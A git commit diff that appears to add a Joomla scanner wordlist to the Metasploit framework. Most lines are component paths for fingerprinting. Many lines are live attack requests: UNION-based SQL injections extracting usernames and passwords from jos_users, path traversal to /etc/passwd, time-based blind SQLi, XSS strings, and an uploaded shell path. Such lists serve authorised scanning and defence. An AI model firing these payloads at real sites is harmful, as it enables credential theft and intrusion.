Merge branch 'joomla-scanner' of https://github.com/Newpid0/metasploit-framework into Newpid0-joomla-scanner
commit
d0ecb617c3
|
@ -0,0 +1,627 @@
|
||||||
|
&controller=../../../../../../../../../../../../[LFI]%00
|
||||||
|
?1.5.10-x
|
||||||
|
?1.5.11-x-http_ref
|
||||||
|
?1.5.11-x-php-s3lf
|
||||||
|
?1.5.3-path-disclose
|
||||||
|
?1.5.3-spam
|
||||||
|
?1.5.8-x
|
||||||
|
?1.5.9-x
|
||||||
|
?j1012-fixate-session
|
||||||
|
?option=com_mysms&Itemid=0&task=phonebook
|
||||||
|
Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png
|
||||||
|
admin/
|
||||||
|
administrator/
|
||||||
|
administrator/components/
|
||||||
|
administrator/components/com_a6mambocredits/
|
||||||
|
administrator/components/com_a6mambohelpdesk/
|
||||||
|
administrator/components/com_admin/admin.admin.html.php
|
||||||
|
administrator/components/com_astatspro/refer.php
|
||||||
|
administrator/components/com_bayesiannaivefilter/
|
||||||
|
administrator/components/com_chronocontact/excelwriter/PPS/File.php
|
||||||
|
administrator/components/com_colophon/
|
||||||
|
administrator/components/com_colorlab/
|
||||||
|
administrator/components/com_comprofiler/
|
||||||
|
administrator/components/com_comprofiler/plugin.class.php
|
||||||
|
administrator/components/com_cropimage/admin.cropcanvas.php
|
||||||
|
administrator/components/com_extplorer/
|
||||||
|
administrator/components/com_feederator/includes/tmsp/add_tmsp.php
|
||||||
|
administrator/components/com_googlebase/
|
||||||
|
administrator/components/com_installer
|
||||||
|
administrator/components/com_jcs/
|
||||||
|
administrator/components/com_jim/
|
||||||
|
administrator/components/com_jjgallery/
|
||||||
|
administrator/components/com_joom12pic/
|
||||||
|
administrator/components/com_joomla-visites/
|
||||||
|
administrator/components/com_joomla_flash_uploader/
|
||||||
|
administrator/components/com_joomlaflashfun/
|
||||||
|
administrator/components/com_joomlaradiov5/
|
||||||
|
administrator/components/com_jpack/
|
||||||
|
administrator/components/com_jreactions/
|
||||||
|
administrator/components/com_juser/
|
||||||
|
administrator/components/com_admin/
|
||||||
|
administrator/components/com_kochsuite /
|
||||||
|
administrator/components/com_linkdirectory/
|
||||||
|
administrator/components/com_livechat/getSavedChatRooms.php
|
||||||
|
administrator/components/com_livechat/xmlhttp.php
|
||||||
|
administrator/components/com_lurm_constructor/admin.lurm_constructor.php
|
||||||
|
administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
|
||||||
|
administrator/components/com_mambelfish/
|
||||||
|
administrator/components/com_mgm/
|
||||||
|
administrator/components/com_mmp/help.mmp.php
|
||||||
|
administrator/components/com_mosmedia/
|
||||||
|
administrator/components/com_multibanners/extadminmenus.class.php
|
||||||
|
administrator/components/com_panoramic/
|
||||||
|
administrator/components/com_peoplebook/param.peoplebook.php
|
||||||
|
administrator/components/com_phpshop/toolbar.phpshop.html.php
|
||||||
|
administrator/components/com_remository/admin.remository.php
|
||||||
|
administrator/components/com_serverstat/install.serverstat.php
|
||||||
|
administrator/components/com_simpleswfupload/uploadhandler.php");
|
||||||
|
administrator/components/com_swmenupro/
|
||||||
|
administrator/components/com_treeg/
|
||||||
|
administrator/components/com_uhp/
|
||||||
|
administrator/components/com_uhp2/
|
||||||
|
administrator/components/com_webring/
|
||||||
|
administrator/components/com_wmtgallery/
|
||||||
|
administrator/components/com_wmtportfolio/
|
||||||
|
administrator/components/com_x-shop/
|
||||||
|
administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
|
||||||
|
administrator/index.php?option=com_searchlog&act=log
|
||||||
|
ajaxim/
|
||||||
|
akocomments.php
|
||||||
|
cart?Itemid=[SQLi]
|
||||||
|
component/com__brightweblinks/
|
||||||
|
component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
|
||||||
|
component/osproperty/?task=agent_register
|
||||||
|
component/quran/index.php?option=com_quran&action=viewayat&surano=
|
||||||
|
components/com_ clickheat/
|
||||||
|
components/com_5starhotels/
|
||||||
|
components/com_Jambook/jambook.php
|
||||||
|
components/com_a6mambocredits/
|
||||||
|
components/com_a6mambohelpdesk/
|
||||||
|
components/com_ab_gallery/
|
||||||
|
components/com_acajoom/
|
||||||
|
components/com_acctexp/
|
||||||
|
components/com_aclassf/
|
||||||
|
components/com_activities/
|
||||||
|
components/com_actualite/
|
||||||
|
components/com_admin/admin.admin.html.php
|
||||||
|
components/com_advancedpoll/
|
||||||
|
components/com_agora/
|
||||||
|
components/com_agoragroup/
|
||||||
|
components/com_ajaxchat/
|
||||||
|
components/com_akobook/
|
||||||
|
components/com_akocomment/
|
||||||
|
components/com_akogallery
|
||||||
|
components/com_alberghi/
|
||||||
|
components/com_allhotels/
|
||||||
|
components/com_alphacontent/
|
||||||
|
components/com_altas/
|
||||||
|
components/com_amocourse/
|
||||||
|
components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
|
||||||
|
components/com_articles/
|
||||||
|
components/com_artist/
|
||||||
|
components/com_artlinks/
|
||||||
|
components/com_asortyment/
|
||||||
|
components/com_astatspro/
|
||||||
|
components/com_awesom/
|
||||||
|
components/com_babackup/
|
||||||
|
components/com_banners/
|
||||||
|
components/com_bayesiannaivefilter/
|
||||||
|
components/com_be_it_easypartner/
|
||||||
|
components/com_beamospetition/
|
||||||
|
components/com_biblestudy/
|
||||||
|
components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
|
||||||
|
components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
|
||||||
|
components/com_blog/
|
||||||
|
components/com_bookflip/
|
||||||
|
components/com_bookjoomlas/
|
||||||
|
components/com_booklibrary/
|
||||||
|
components/com_books/
|
||||||
|
components/com_bsadv/
|
||||||
|
components/com_bsq_sitestats/
|
||||||
|
components/com_bsq_sitestats/external/rssfeed.php
|
||||||
|
components/com_bsqsitestats/
|
||||||
|
components/com_calendar/
|
||||||
|
components/com_camelcitydb2/
|
||||||
|
components/com_candle/
|
||||||
|
components/com_casino_blackjack/
|
||||||
|
components/com_casino_videopoker/
|
||||||
|
components/com_casinobase/
|
||||||
|
components/com_catalogproduction/
|
||||||
|
components/com_catalogshop/
|
||||||
|
components/com_category/
|
||||||
|
components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
|
||||||
|
components/com_chronocontact/excelwriter/PPS/File.php
|
||||||
|
components/com_cinema/
|
||||||
|
components/com_clasifier/
|
||||||
|
components/com_classifieds/
|
||||||
|
components/com_clickheat/
|
||||||
|
components/com_cloner/
|
||||||
|
components/com_cmimarketplace/
|
||||||
|
components/com_cms/
|
||||||
|
components/com_colophon/
|
||||||
|
components/com_colorlab/
|
||||||
|
components/com_competitions/
|
||||||
|
components/com_comprofiler/
|
||||||
|
components/com_comprofiler/plugin.class.php
|
||||||
|
components/com_contactinfo/
|
||||||
|
components/com_content/
|
||||||
|
components/com_cpg/cpg.php
|
||||||
|
components/com_cropimage/admin.cropcanvas.php
|
||||||
|
components/com_custompages/
|
||||||
|
components/com_cx/
|
||||||
|
components/com_d3000/
|
||||||
|
components/com_dadamail/
|
||||||
|
components/com_dailymessage/
|
||||||
|
components/com_datsogallery/
|
||||||
|
components/com_dbquery/
|
||||||
|
components/com_detail/
|
||||||
|
components/com_digistore/
|
||||||
|
components/com_directory/
|
||||||
|
components/com_djiceshoutbox/
|
||||||
|
components/com_doc/
|
||||||
|
components/com_downloads/
|
||||||
|
components/com_ds-syndicate/
|
||||||
|
components/com_dtregister/
|
||||||
|
components/com_dv/externals/phpupload/upload.php");
|
||||||
|
components/com_easybook/
|
||||||
|
components/com_emcomposer/
|
||||||
|
components/com_equotes/
|
||||||
|
components/com_estateagent/
|
||||||
|
components/com_eventing/
|
||||||
|
components/com_eventlist/
|
||||||
|
components/com_events/
|
||||||
|
components/com_ewriting/
|
||||||
|
components/com_expose/uploadimg.php
|
||||||
|
components/com_expshop/
|
||||||
|
components/com_extcalendar/
|
||||||
|
components/com_extcalendar/cal_popup.php?extmode=view&extid=
|
||||||
|
components/com_extcalendar/extcalendar.php
|
||||||
|
components/com_extended_registration/registration_detailed.inc.php
|
||||||
|
components/com_extplorer/
|
||||||
|
components/com_ezine/
|
||||||
|
components/com_ezstore/
|
||||||
|
components/com_facileforms/
|
||||||
|
components/com_fantasytournament/
|
||||||
|
components/com_faq/
|
||||||
|
components/com_feederator/includes/tmsp/add_tmsp.php
|
||||||
|
components/com_filebase/
|
||||||
|
components/com_filiale/
|
||||||
|
components/com_flashfun/
|
||||||
|
components/com_flashmagazinedeluxe/
|
||||||
|
components/com_flippingbook/
|
||||||
|
components/com_flyspray/startdown.php
|
||||||
|
components/com_fm/fm.install.php
|
||||||
|
components/com_foevpartners/
|
||||||
|
components/com_football/
|
||||||
|
components/com_formtool/
|
||||||
|
components/com_forum/
|
||||||
|
components/com_fq/
|
||||||
|
components/com_fundraiser/
|
||||||
|
components/com_galeria/
|
||||||
|
components/com_galleria/galleria.html.php
|
||||||
|
components/com_gallery/
|
||||||
|
components/com_game/
|
||||||
|
components/com_gameq/
|
||||||
|
components/com_garyscookbook/
|
||||||
|
components/com_genealogy/
|
||||||
|
components/com_geoboerse/
|
||||||
|
components/com_gigcal/
|
||||||
|
components/com_gmaps/
|
||||||
|
components/com_googlebase/
|
||||||
|
components/com_gsticketsystem/
|
||||||
|
components/com_guide/
|
||||||
|
components/com_hashcash/server.php
|
||||||
|
components/com_hbssearch/
|
||||||
|
components/com_hello_world/
|
||||||
|
components/com_hotproperties/
|
||||||
|
components/com_hotproperty/
|
||||||
|
components/com_hotspots/
|
||||||
|
components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
|
||||||
|
components/com_hwdvideoshare/
|
||||||
|
components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
|
||||||
|
components/com_ice/
|
||||||
|
components/com_idoblog/
|
||||||
|
components/com_idvnews/
|
||||||
|
components/com_ignitegallery/
|
||||||
|
components/com_ijoomla_archive/
|
||||||
|
components/com_ijoomla_rss/
|
||||||
|
components/com_inter/
|
||||||
|
components/com_ionfiles/
|
||||||
|
components/com_is/
|
||||||
|
components/com_ixxocart/
|
||||||
|
components/com_jabode/
|
||||||
|
components/com_jashowcase/
|
||||||
|
components/com_jb2/
|
||||||
|
components/com_jce/
|
||||||
|
components/com_jcs/
|
||||||
|
components/com_jd-wiki/
|
||||||
|
components/com_jd-wp/
|
||||||
|
components/com_jim/
|
||||||
|
components/com_jjgallery/
|
||||||
|
components/com_jmovies/
|
||||||
|
components/com_jobline/
|
||||||
|
components/com_jombib/
|
||||||
|
components/com_joobb/
|
||||||
|
components/com_jooget/
|
||||||
|
components/com_joom12pic/
|
||||||
|
components/com_joomla-visites/
|
||||||
|
components/com_joomla_flash_uploader/
|
||||||
|
components/com_joomlaboard/
|
||||||
|
components/com_joomladate/
|
||||||
|
components/com_joomlaflashfun/
|
||||||
|
components/com_joomlalib/
|
||||||
|
components/com_joomlaradiov5/
|
||||||
|
components/com_joomlavvz/
|
||||||
|
components/com_joomlaxplorer/
|
||||||
|
components/com_joomloads/
|
||||||
|
components/com_joomradio/
|
||||||
|
components/com_joomtracker/
|
||||||
|
components/com_joovideo/
|
||||||
|
components/com_jotloader/
|
||||||
|
components/com_journal/
|
||||||
|
components/com_jpack/
|
||||||
|
components/com_jpad/
|
||||||
|
components/com_jreactions/
|
||||||
|
components/com_jreviews/scripts/xajax.inc.php
|
||||||
|
components/com_jumi/
|
||||||
|
components/com_juser/
|
||||||
|
components/com_jvideo/
|
||||||
|
components/com_k2/
|
||||||
|
components/com_kbase/
|
||||||
|
components/com_knowledgebase/fckeditor/fckeditor.js
|
||||||
|
components/com_kochsuite /
|
||||||
|
components/com_kunena/
|
||||||
|
components/com_letterman/
|
||||||
|
components/com_lexikon/
|
||||||
|
components/com_linkdirectory/
|
||||||
|
components/com_listoffreeads/
|
||||||
|
components/com_livechat/getSavedChatRooms.php
|
||||||
|
components/com_livechat/xmlhttp.php
|
||||||
|
components/com_liveticker/
|
||||||
|
components/com_lm/
|
||||||
|
components/com_lmo/
|
||||||
|
components/com_loudmounth/includes/abbc/abbc.class.php
|
||||||
|
components/com_loudmouth/
|
||||||
|
components/com_lowcosthotels/
|
||||||
|
components/com_lurm_constructor/admin.lurm_constructor.php
|
||||||
|
components/com_mad4joomla/
|
||||||
|
components/com_madeira/img.php
|
||||||
|
components/com_maianmusic/
|
||||||
|
components/com_mailarchive/
|
||||||
|
components/com_mailto/
|
||||||
|
components/com_mambatstaff/mambatstaff.php
|
||||||
|
components/com_mambelfish/
|
||||||
|
components/com_mambospgm/
|
||||||
|
components/com_mambowiki/MamboLogin.php
|
||||||
|
components/com_marketplace/
|
||||||
|
components/com_mcquiz/
|
||||||
|
components/com_mdigg/
|
||||||
|
components/com_media_library/
|
||||||
|
components/com_mediaslide/
|
||||||
|
components/com_mezun/
|
||||||
|
components/com_mgm/
|
||||||
|
components/com_minibb/
|
||||||
|
components/com_misterestate/
|
||||||
|
components/com_mmp/help.mmp.php
|
||||||
|
components/com_model/
|
||||||
|
components/com_moodle/moodle.php
|
||||||
|
components/com_moofaq/
|
||||||
|
components/com_mosmedia/
|
||||||
|
components/com_mospray/scripts/admin.php
|
||||||
|
components/com_mosres/
|
||||||
|
components/com_most/
|
||||||
|
components/com_mp3_allopass/
|
||||||
|
components/com_mtree/
|
||||||
|
components/com_mtree/img/listings/o/{id}.php
|
||||||
|
components/com_multibanners/extadminmenus.class.php
|
||||||
|
components/com_myalbum/
|
||||||
|
components/com_mycontent/
|
||||||
|
components/com_mydyngallery/
|
||||||
|
components/com_mygallery/
|
||||||
|
components/com_n-forms/
|
||||||
|
components/com_na_content/
|
||||||
|
components/com_na_mydocs/
|
||||||
|
components/com_na_newsdescription/
|
||||||
|
components/com_na_qforms/
|
||||||
|
components/com_neogallery/
|
||||||
|
components/com_neorecruit/
|
||||||
|
components/com_neoreferences/
|
||||||
|
components/com_netinvoice/
|
||||||
|
components/com_news/
|
||||||
|
components/com_news_portal/
|
||||||
|
components/com_newsflash/
|
||||||
|
components/com_nfn_addressbook/
|
||||||
|
components/com_nicetalk/
|
||||||
|
components/com_noticias/
|
||||||
|
components/com_omnirealestate/
|
||||||
|
components/com_omphotogallery/
|
||||||
|
components/com_ongumatimesheet20/
|
||||||
|
components/com_onlineflashquiz/
|
||||||
|
components/com_ownbiblio/
|
||||||
|
components/com_panoramic/
|
||||||
|
components/com_paxgallery/
|
||||||
|
components/com_paxxgallery/
|
||||||
|
components/com_pcchess/
|
||||||
|
components/com_pcchess/include.pcchess.php
|
||||||
|
components/com_pccookbook/
|
||||||
|
components/com_pccookbook/pccookbook.php
|
||||||
|
components/com_peoplebook/param.peoplebook.php
|
||||||
|
components/com_performs/
|
||||||
|
components/com_philaform/
|
||||||
|
components/com_phocadocumentation/
|
||||||
|
components/com_php/
|
||||||
|
components/com_phpshop/toolbar.phpshop.html.php
|
||||||
|
components/com_pinboard/
|
||||||
|
components/com_pms/
|
||||||
|
components/com_poll/
|
||||||
|
components/com_pollxt/
|
||||||
|
components/com_ponygallery/
|
||||||
|
components/com_portafolio/
|
||||||
|
components/com_portfol/
|
||||||
|
components/com_prayercenter/
|
||||||
|
components/com_pro_desk/
|
||||||
|
components/com_prod/
|
||||||
|
components/com_productshowcase/
|
||||||
|
components/com_profiler/
|
||||||
|
components/com_projectfork/
|
||||||
|
components/com_propertylab/
|
||||||
|
components/com_puarcade/
|
||||||
|
components/com_publication/
|
||||||
|
components/com_quiz/
|
||||||
|
components/com_rapidrecipe/
|
||||||
|
components/com_rdautos/
|
||||||
|
components/com_realestatemanager/
|
||||||
|
components/com_recly/
|
||||||
|
components/com_referenzen/
|
||||||
|
components/com_rekry/
|
||||||
|
components/com_remository/admin.remository.php
|
||||||
|
components/com_remository_files/file_image_14/1276100016shell.php
|
||||||
|
components/com_reporter/processor/reporter.sql.php
|
||||||
|
components/com_resman/
|
||||||
|
components/com_restaurante/
|
||||||
|
components/com_ricette/
|
||||||
|
components/com_rsfiles/
|
||||||
|
components/com_rsgallery/
|
||||||
|
components/com_rsgallery2/
|
||||||
|
components/com_rss/
|
||||||
|
components/com_rssreader/
|
||||||
|
components/com_rssxt/
|
||||||
|
components/com_rwcards/
|
||||||
|
components/com_school/
|
||||||
|
components/com_search/
|
||||||
|
components/com_sebercart/getPic.php?p=[LFD]%00
|
||||||
|
components/com_securityimages/
|
||||||
|
components/com_sef/
|
||||||
|
components/com_seminar/
|
||||||
|
components/com_serverstat/install.serverstat.php
|
||||||
|
components/com_sg/
|
||||||
|
components/com_simple_review/
|
||||||
|
components/com_simpleboard/
|
||||||
|
components/com_simplefaq/
|
||||||
|
components/com_simpleshop/
|
||||||
|
components/com_sitemap/sitemap.xml.php
|
||||||
|
components/com_slideshow/
|
||||||
|
components/com_smf/
|
||||||
|
components/com_smf/smf.php
|
||||||
|
components/com_swmenupro/
|
||||||
|
components/com_team/
|
||||||
|
components/com_tech_article/
|
||||||
|
components/com_thopper/
|
||||||
|
components/com_thyme/
|
||||||
|
components/com_tickets/
|
||||||
|
components/com_tophotelmodule/
|
||||||
|
components/com_tour_toto/
|
||||||
|
components/com_trade/
|
||||||
|
components/com_uhp/
|
||||||
|
components/com_uhp2/
|
||||||
|
components/com_user/controller.php
|
||||||
|
components/com_users/
|
||||||
|
components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
|
||||||
|
components/com_vehiclemanager/
|
||||||
|
components/com_versioning /
|
||||||
|
components/com_videodb/core/videodb.class.xml.php
|
||||||
|
components/com_virtuemart/
|
||||||
|
components/com_volunteer/
|
||||||
|
components/com_vr/
|
||||||
|
components/com_waticketsystem/
|
||||||
|
components/com_webhosting/
|
||||||
|
components/com_weblinks/
|
||||||
|
components/com_webring/
|
||||||
|
components/com_wmtgallery/
|
||||||
|
components/com_wmtportfolio/
|
||||||
|
components/com_x-shop/
|
||||||
|
components/com_xevidmegahd/
|
||||||
|
components/com_xewebtv/
|
||||||
|
components/com_xfaq/
|
||||||
|
components/com_xgallery/helpers/img.php?file=
|
||||||
|
components/com_xsstream-dm/
|
||||||
|
components/com_ynews/
|
||||||
|
components/com_yvcomment/
|
||||||
|
components/com_zoom/classes/
|
||||||
|
components/mod_letterman/
|
||||||
|
components/remository/
|
||||||
|
eXtplorer/
|
||||||
|
easyblog/entry/uncategorized
|
||||||
|
extplorer/
|
||||||
|
components/com_mtree/img/listings/o/{id}.php where {id}
|
||||||
|
includes/joomla.php
|
||||||
|
index.php/404'
|
||||||
|
index.php/?option=com_question&catID=21' and+1=0 union all
|
||||||
|
index.php/image-gallery/"><script>alert('xss')</script>/25-koala
|
||||||
|
index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1
|
||||||
|
index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
|
||||||
|
index.php?option=com_aardvertiser&cat_name=conf&task=<=
|
||||||
|
index.php?option=com_aardvertiser&task=
|
||||||
|
index.php?option=com_abc&view=abc&letter=AS§ionid='
|
||||||
|
index.php?option=com_advert&id=36'
|
||||||
|
index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
|
||||||
|
index.php?option=com_alfurqan15x&action=viewayat&surano=
|
||||||
|
index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
|
||||||
|
index.php?option=com_annonces&view=edit&Itemid=1
|
||||||
|
index.php?option=com_articleman&task=new
|
||||||
|
index.php?option=com_bbs&bid=-1
|
||||||
|
index.php?option=com_beamospetition&startpage=3&pet=-
|
||||||
|
index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
|
||||||
|
index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
|
||||||
|
index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
|
||||||
|
index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
|
||||||
|
index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
|
||||||
|
index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
|
||||||
|
index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
|
||||||
|
index.php?option=com_chronoconnectivity&itemid=1
|
||||||
|
index.php?option=com_chronocontact&itemid=1
|
||||||
|
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=
|
||||||
|
index.php?option=com_clantools&squad=1+
|
||||||
|
index.php?option=com_clantools&task=clanwar&showgame=1+
|
||||||
|
index.php?option=com_commedia&format=raw&task=image&pid=4&id=964'
|
||||||
|
index.php?option=com_commedia&task=page&commpid=21
|
||||||
|
index.php?option=com_connect&view=connect&controller=
|
||||||
|
index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
|
||||||
|
index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
|
||||||
|
index.php?option=com_dioneformwizard&controller=[LFI]%00
|
||||||
|
index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1
|
||||||
|
index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12
|
||||||
|
index.php?option=com_easyfaq&Itemid=1&task=view&gid=
|
||||||
|
index.php?option=com_easyfaq&catid=1&task=view&id=-2527+
|
||||||
|
index.php?option=com_easyfaq&task=view&contact_id=
|
||||||
|
index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
|
||||||
|
index.php?option=com_equipment&task=components&id=45&sec_men_id=
|
||||||
|
index.php?option=com_equipment&view=details&id=
|
||||||
|
index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
|
||||||
|
index.php?option=com_etree&view=displays&layout=category&id=[SQL]
|
||||||
|
index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
|
||||||
|
index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
|
||||||
|
index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
|
||||||
|
index.php?option=com_filecabinet&task=download&cid[]=7
|
||||||
|
index.php?option=com_firmy&task=section_show_set&Id=-1
|
||||||
|
index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
|
||||||
|
index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
|
||||||
|
index.php?option=com_graphics&controller=
|
||||||
|
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
|
||||||
|
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
|
||||||
|
index.php?option=com_huruhelpdesk&view=detail
|
||||||
|
index.php?option=com_huruhelpdesk&view=detail&cid[0]=
|
||||||
|
index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
|
||||||
|
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1
|
||||||
|
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2
|
||||||
|
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
|
||||||
|
index.php?option=com_iproperty&view=agentproperties&id=
|
||||||
|
index.php?option=com_jacomment&view=
|
||||||
|
index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
|
||||||
|
index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
index.php?option=com_jcommunity&controller=members&task=1'
|
||||||
|
index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
|
||||||
|
index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
|
||||||
|
index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
|
||||||
|
index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
|
||||||
|
index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
|
||||||
|
index.php?option=com_jfuploader&Itemid=
|
||||||
|
index.php?option=com_jgen&task=view&id=
|
||||||
|
index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
|
||||||
|
index.php?option=com_jimtawl&Itemid=12&task=
|
||||||
|
index.php?option=com_jmarket&controller=product&task=1'
|
||||||
|
index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
|
||||||
|
index.php?option=com_jomdirectory&task=search&type=111+
|
||||||
|
index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
|
||||||
|
index.php?option=com_joomla_flash_uploader&Itemid=1
|
||||||
|
index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
|
||||||
|
index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
|
||||||
|
index.php?option=com_joomtouch&controller=
|
||||||
|
index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
|
||||||
|
index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
|
||||||
|
index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
|
||||||
|
index.php?option=com_jstore&controller=product-display&task=1'
|
||||||
|
index.php?option=com_jsubscription&controller=subscription&task=1'
|
||||||
|
index.php?option=com_jtickets&controller=ticket&task=1'
|
||||||
|
index.php?option=com_konsultasi&act=detail&sid=
|
||||||
|
index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
|
||||||
|
index.php?option=com_kunena&func=userlist&search=
|
||||||
|
index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
|
||||||
|
index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
|
||||||
|
index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
|
||||||
|
index.php?option=com_matamko&controller=
|
||||||
|
index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
|
||||||
|
index.php?option=com_neorecruit&task=offer_view&id=
|
||||||
|
index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
|
||||||
|
index.php?option=com_noticeboard&controller=
|
||||||
|
index.php?option=com_obsuggest&controller=
|
||||||
|
index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
|
||||||
|
index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
|
||||||
|
index.php?option=com_oziogallery&Itemid=
|
||||||
|
index.php?option=com_page&id=53
|
||||||
|
index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
|
||||||
|
index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
|
||||||
|
index.php?option=com_phocagallery&view=categories&Itemid=
|
||||||
|
index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
|
||||||
|
index.php?option=com_php&file=../../../../../../../../../../etc/passwd
|
||||||
|
index.php?option=com_php&file=../images/phplogo.jpg
|
||||||
|
index.php?option=com_php&file=../js/ie_pngfix.js
|
||||||
|
index.php?option=com_ponygallery&Itemid=[sqli]
|
||||||
|
index.php?option=com_products&catid=-1
|
||||||
|
index.php?option=com_products&id=-1
|
||||||
|
index.php?option=com_products&product_id=-1
|
||||||
|
index.php?option=com_products&task=category&catid=-1
|
||||||
|
index.php?option=com_properties&task=agentlisting&aid=
|
||||||
|
index.php?option=com_qcontacts&Itemid=1'
|
||||||
|
index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
|
||||||
|
index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
|
||||||
|
index.php?option=com_restaurantguide&view=country&id='&Itemid=69
|
||||||
|
index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
|
||||||
|
index.php?option=com_seyret&view=
|
||||||
|
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
|
||||||
|
index.php?option=com_smartsite&controller=
|
||||||
|
index.php?option=com_spa&view=spa_product&cid=
|
||||||
|
index.php?option=com_spidercalendar
|
||||||
|
index.php?option=com_spidercalendar&date=1'
|
||||||
|
index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
|
||||||
|
index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
|
||||||
|
index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
|
||||||
|
index.php?option=com_staticxt&staticfile=test.php&id=1923
